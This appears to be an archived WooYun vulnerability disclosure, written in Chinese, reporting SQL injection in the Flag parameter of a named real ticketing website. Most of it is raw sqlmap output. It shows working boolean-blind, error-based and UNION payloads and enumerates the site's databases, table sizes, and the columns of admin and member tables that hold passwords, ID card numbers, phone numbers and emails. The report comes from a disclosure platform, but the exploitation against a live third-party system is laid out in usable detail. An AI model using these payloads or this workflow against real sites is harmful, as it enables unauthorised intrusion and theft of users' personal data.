乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开
没有提交重复吧!~~~趁着回来休息的时间测试一下,晚上都不知道搞到什么时候,所以先提交了!~~~
首先,地址是
http://www.51piao.com/Flight/FlightSale.aspx?Flag=2
Flag存在注入
http://www.51piao.com/Flight/FlightSale.aspx?Flag=2'
测试返回结果
“/”应用程序中的服务器错误。字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 异常详细信息: System.Exception: 字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。
这样应该是有注入了吧!~~~
[*] starting at 16:15:42[16:15:42] [INFO] testing connection to the target URL[16:15:44] [INFO] testing if the target URL is stable. This can take a couple of seconds[16:15:45] [INFO] target URL is stable[16:15:45] [INFO] testing if GET parameter 'Flag' is dynamic[16:15:46] [INFO] confirming that GET parameter 'Flag' is dynamic[16:15:47] [INFO] GET parameter 'Flag' is dynamic[16:15:47] [WARNING] reflective value(s) found and filtering out[16:15:47] [INFO] heuristic (basic) test shows that GET parameter 'Flag' might be injectable[16:15:47] [INFO] testing for SQL injection on GET parameter 'Flag'[16:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[16:15:52] [INFO] GET parameter 'Flag' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[16:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[16:15:59] [INFO] GET parameter 'Flag' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[16:15:59] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[16:16:05] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[16:16:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[16:16:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[16:16:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[16:16:29] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[16:16:33] [INFO] target URL appears to have 1 column in query[16:16:33] [INFO] GET parameter 'Flag' is 'Generic UNION query (NULL) - 1 to 20columns' injectableGET parameter 'Flag' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection points with a total of 22 HTTP(s) requests:---Place: GETParameter: Flag Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Flag=2) AND 4749=4749 AND (2763=2763 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Flag=2) AND 7428=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7428=7428) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113))) AND (4091=4091 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: Flag=2) UNION ALL SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CHAR(113)+CHAR(67)+CHAR(114)+CHAR(98)+CHAR(81)+CHAR(79)+CHAR(100)+CHAR(84)+CHAR(89)+CHAR(65)+CHAR(83)+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113)-----[16:16:53] [INFO] testing Microsoft SQL Server[16:16:53] [INFO] confirming Microsoft SQL Server[16:16:54] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000[16:20:37] [INFO] testing Microsoft SQL Server[16:20:37] [INFO] confirming Microsoft SQL Server[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000[16:20:38] [INFO] fetching current usercurrent user: 'web61247'[16:20:38] [INFO] fetching current databasecurrent database: 'www_51piao_com'[16:20:38] [INFO] testing if current user is DBAcurrent user is DBA: Falseavailable databases [7]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] www_51piao_comDatabase: www_51piao_com+------------------------------+---------+| Table | Entries |+------------------------------+---------+| dbo.OrderLog | 960682 || dbo.TicketPrice | 370811 || dbo.vMemberAll | 341363 || dbo.vTicketPrice | 248395 || dbo.MemberAddrBook | 205929 || dbo.OrderMain | 179388 || dbo.OprLog | 178075 || dbo.vEmailAll | 130014 || dbo.MemberPointLog | 126487 || dbo.TicketOrderDetail | 124568 || dbo.TicketOrderDetail | 124568 || dbo.TicketOrderDetail | 124568 || dbo.vTicketOrderStat | 124568 || dbo.vFlightTicketOrder | 121543 || dbo.SmsLog | 110904 || dbo.vTicketOrder | 106021 || dbo.vMobileTemp | 98098 || dbo.vMoibleAll | 98098 || dbo.vMobileAllOrder | 98088 || dbo.vMemberTemp | 93105 || dbo.MemberMoneyLog | 81838 || dbo.TicketPlay | 81607 || dbo.VTicketPlayMag | 81561 || dbo.FlightLog | 72994 || dbo.TrainNew | 70195 || dbo.TrainNew | 70195 || dbo.vLoginLog | 58664 || dbo.ImagesTicket | 37727 || dbo.monitor | 36593 || dbo.FlightOrderDetail | 31300 || dbo.FlightOrderDetail | 31300 || dbo.vFlightOrderDetail | 21042 || dbo.vFlightOrderDetail | 21042 || dbo.vTicketDetail | 14126 || dbo.vTicketMag | 14126 || dbo.OrderPayCard | 13596 || dbo.vOrderPayCard | 13596 || dbo.MemberLog | 11974 || dbo.vFlightTicketSend | 10295 || dbo.AccountAll | 8329 || dbo.TicketPreOrder | 6293 || dbo.vTicketAddrUse | 5225 || dbo.vTicketAddrUse | 5225 || dbo.TicketReview | 3253 || dbo.FlightLogStat | 2756 || dbo.vTicketReviewList | 2647 || dbo.FlightKM | 1398 || dbo.o_kehu | 1317 || dbo.ImagesCommon | 860 || dbo.WebTop | 858 || dbo.JOYCOMPANY | 786 || dbo.VJoyCompanyMag | 786 || dbo.VJoyCompanyMag | 786 || dbo.LinkInfo | 780 || dbo.CITY | 647 || dbo.AgentInfo | 526 || dbo.VChinaCity | 455 || dbo.VNewsHelp1 | 416 || dbo.VNewsHelp1 | 416 || dbo.PointProductOrder | 293 || dbo.PointProductOrder | 293 || dbo.vTicketBig | 280 || dbo.vTicketHomeTop | 279 || dbo.MemberWebUnion | 210 || dbo.vTicketLeft | 176 || dbo.vTicketSmall | 155 || dbo.FlightCityCode | 152 || dbo.FlightSale | 144 || dbo.VFlightSale | 141 || dbo.Area | 131 || dbo.Users | 116 || dbo.vUserMag | 116 || dbo.BlackIp | 103 || dbo.REGION | 96 || dbo.vTrainTrade | 65 || dbo.TrainTradeBak | 60 || dbo.TrainTradeBak | 60 || dbo.NewsHelpModule | 57 || dbo.NewsHelpModule | 57 || dbo.sysconstraints | 54 || dbo.vPointProduct1 | 44 || dbo.vPointProduct1 | 44 || dbo.VTravelLine1 | 35 || dbo.VTravelLine1 | 35 || dbo.vTravelLineDetail | 35 || dbo.Province | 34 || dbo.vMobileAllTrain | 26 || web61247.pangolin_test_table | 26 || dbo.vTicketTypeCount | 22 || dbo.vTicketTypeCount | 22 || dbo.TempSql | 17 || dbo.vJoyCompanyTop | 17 || dbo.TicketType | 14 || dbo.OrderPayMethod | 12 || dbo.FlightSpec | 11 || dbo.vFlightSpec | 11 || web61247.D99_Tmp | 11 || dbo.MemberGroup | 10 || dbo.SmsTemplate | 10 || dbo.vSmsTemplate | 10 || dbo.vTemp | 10 || dbo.BaseCreditCard | 9 || dbo.WebModule | 9 || dbo.vWebCity | 8 || dbo.WebCity | 8 || dbo.BlackList | 7 || dbo.SmsEvent | 7 || dbo.BbsBanner | 6 || dbo.Groups | 6 || dbo.OrderFlightTakeAddr | 6 || dbo.PointProductType | 5 || dbo.vHomeTicket | 5 || dbo.vSmsModule | 5 || dbo.vHotelOrder | 4 || dbo.syssegments | 3 || dbo.BaseYesNo | 2 || dbo.FlightTicketAddr | 2 || dbo.PriceType | 2 || dbo.CompanySeq | 1 || dbo.FlightSaleTop | 1 || dbo.OrderSeq | 1 || dbo.TravelCompany | 1 |+------------------------------+---------+不知道获取整个数据库的count的时候member没有了,还好上次测试的时候发现有members这个,所以似乎用户又多了一些了!~~~Database: www_51piao_com+--------------+---------+| Table | Entries |+--------------+---------+| dbo.Member | 198778 || dbo.vMember | 198778 || dbo.Users | 116 || dbo.vUserMag | 116 |+--------------+---------+Database: www_51piao_comTable: Users[9 columns]+---------------+| Column |+---------------+| Account || ID || IsDisabled || LastLoginTime || LEVELID || LoginCount || Password || PurView || UserName |+---------------+Database: www_51piao_comTable: vUserMag[10 columns]+---------------+| Column |+---------------+| Account || DepartName || ID || IsDisabled || LastLoginTime || LEVELID || LoginCount || Password || PurView || UserName |+---------------+Database: www_51piao_comTable: Member[43 columns]+---------------+| Column |+---------------+| Account || Address || Balance || BirthDay || CardNo || CardType || CityId || COMPANYADDR || CompanyId || CompanyName || COMPANYTEL || CompanyType || Degree || Email || FAX || GroupId || ID || ISAuditing || IsBindMobile || IsChinese || IsDesignWeb || IsDisabled || IsMailList || IsWeb || LastLoginTime || LoginCount || MemberType || MEMO || MOBILE || Name || NickName || openid || POINT || ProvinceId || Pwd || RegDate || SEX || STAFFID || STAFFNAME || TEL || VipMoney || VipNo || ZIPCODE |+---------------+Database: www_51piao_comTable: vMember[45 columns]+---------------+| Column |+---------------+| Account || Address || Balance || BirthDay || CardNo || CardType || City || CityId || COMPANYADDR || CompanyId || CompanyName || COMPANYTEL || CompanyType || Degree || Email || FAX || GroupId || GroupName || ID || ISAuditing || IsBindMobile || IsChinese || IsDesignWeb || IsDisabled || IsMailList || IsWeb || LastLoginTime || LoginCount || MemberType || MEMO || MOBILE || Name || NickName || openid || POINT || ProvinceId || Pwd || RegDate || SEX || STAFFID || STAFFNAME || TEL || VipMoney || VipNo || ZIPCODE |+---------------+
数据挺大的,就不继续了!~~~~而且时间关系,赶着出去,也就不往下测试了,明天再测试其他的!~~~
如上
过滤修复
未能联系到厂商或者厂商积极拒绝